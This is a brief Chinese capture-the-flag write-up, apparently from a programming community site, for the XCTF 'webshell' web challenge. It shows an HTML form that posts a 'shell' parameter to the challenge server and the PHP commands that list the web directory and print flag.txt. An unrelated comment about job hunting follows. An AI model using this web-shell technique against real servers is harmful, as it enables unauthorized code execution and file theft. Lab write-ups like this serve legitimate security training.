XCTF WEB webshell

https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070

版本一

题解:修改HTML代码提交一个shell的变量

变量值是webshell命令

​​​​​​​<form action="http://111.198.29.45:36317/index.php" method="post">
    <input type="text" name="shell">
    <input type="submit" value="提交">
</form>

提交命令

print_r(scandir(getcwd()));

在网站目录下发现了flag.txt

 提交命令

print_r(show_source('flag.txt'));

全部评论

相关推荐

找工作勤劳小蜜蜂:矛盾是没有实习,就是没实战经验,公司不想要,公司不要,你就没有实习,你就进入死循环,另外你的项目不是社会现在有大量岗位存在行业用的,云存储人员早就饱和。
点赞 评论 收藏
分享
评论
点赞
收藏
分享

创作者周榜

更多
牛客网
牛客网在线编程
牛客网题解
牛客企业服务